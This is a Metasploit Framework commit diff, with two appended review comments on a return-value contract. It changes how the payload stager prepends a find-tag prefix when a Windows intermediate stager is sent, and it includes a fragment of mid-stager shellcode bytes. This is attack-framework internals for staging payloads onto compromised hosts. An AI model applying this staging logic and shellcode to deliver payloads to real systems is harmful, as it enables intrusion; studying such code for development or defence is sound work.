the tag used for find tag must be sent BEFORE the intermediate stage
git-svn-id: file:///home/svn/framework3/trunk@5084 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
8dcba76799
commit
23da91742e
|
@ -74,9 +74,6 @@ module Msf::Payload::Stager
|
|||
# Substitute variables in the stage
|
||||
substitute_vars(p, stage_offsets) if (stage_offsets)
|
||||
|
||||
# Prefix to the stage with whatever may be required and then rock it.
|
||||
p = (self.stage_prefix || '') + p
|
||||
|
||||
return p
|
||||
end
|
||||
|
||||
|
@ -93,7 +90,12 @@ module Msf::Payload::Stager
|
|||
# the stage is sent. This gives derived classes an opportunity to
|
||||
# augment the stage and the process through which it is read on the
|
||||
# remote machine.
|
||||
handle_intermediate_stage(conn, p)
|
||||
#
|
||||
# If we don't use an intermediate stage, then we need to prepend the
|
||||
# stage prefix, such as a tag
|
||||
if handle_intermediate_stage(conn, p) == false
|
||||
p = (self.stage_prefix || '') + p
|
||||
end
|
||||
|
||||
print_status("Sending stage (#{p.length} bytes)")
|
||||
|
||||
|
@ -128,6 +130,7 @@ module Msf::Payload::Stager
|
|||
# encapsulate its transmission.
|
||||
#
|
||||
def handle_intermediate_stage(conn, payload)
|
||||
false
|
||||
end
|
||||
|
||||
# Aliases
|
||||
|
|
|
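Review bot: The guard `if handle_intermediate_stage(conn, p) == false` in the second hunk prepends stage_prefix only when the override returns exactly `false`; an override that still exits with a bare `return` (yielding `nil`, as the Windows version did before this commit) or that returns whatever `conn.put` produced would silently skip the tag, and the find-tag stager would never locate its socket. A truthiness test is safer with the old overrides: `p = (self.stage_prefix || '') + p unless handle_intermediate_stage(conn, p)`. The new contract should also be stated once above the base method in the third hunk, e.g. `# Returns true if the stage was transmitted through an intermediate stager (which must send any stage_prefix itself), false if the caller should prefix and send the stage directly.` The enclosing method that owns `p` starts and ends outside the hunk.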
@ -64,7 +64,7 @@ module Msf::Payload::Windows
|
|||
# ensure that the entire stage is read in.
|
||||
#
|
||||
def handle_intermediate_stage(conn, payload)
|
||||
return if (payload.length < 512)
|
||||
return false if (payload.length < 512)
|
||||
|
||||
# The mid-stage works by reading in a four byte length in host-byte
|
||||
# order (which represents the length of the stage). Following that, it
|
||||
|
@ -77,6 +77,10 @@ module Msf::Payload::Windows
|
|||
"\x66\x81\xe4\xfc\xff\x89\xe5\x55\x6a\x00\xff\x33\x55\x57\xff\xd6" +
|
||||
"\x01\xc5\x29\x03\x85\xc0\x75\xf0\xc3"
|
||||
|
||||
# Prepend the stage prefix as necessary, such as a tag that is needed to
|
||||
# find the socket
|
||||
midstager = (self.stage_prefix || '') + midstager
|
||||
|
||||
print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)")
|
||||
|
||||
# Transmit our intermediate stager
|
||||
|
@ -90,6 +94,8 @@ module Msf::Payload::Windows
|
|||
# The mid-stage requires that we transmit a four byte length field that
|
||||
# it will use as the length of the subsequent stage.
|
||||
conn.put([ payload.length ].pack('V'))
|
||||
|
||||
return true
|
||||
end
|
||||
|
||||
end
|
||||
|
|
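Review bot: The header comment above the Windows `handle_intermediate_stage` (it begins before the first hunk of this file) does not document the return value the base class now branches on: `return false if (payload.length < 512)` leaves prefixing and sending to the caller, while the path ending in `return true` has already transmitted stage_prefix in front of the mid-stager plus the four-byte length. Suggest adding `# Returns false when the stage is small enough to be sent directly (caller prepends stage_prefix), true once the mid-stager (already prefixed) and the length field have been transmitted.` Since the same `(self.stage_prefix || '') + x` expression now appears in both files, a small helper on Msf::Payload::Stager would keep the two in step if the prefix handling changes again.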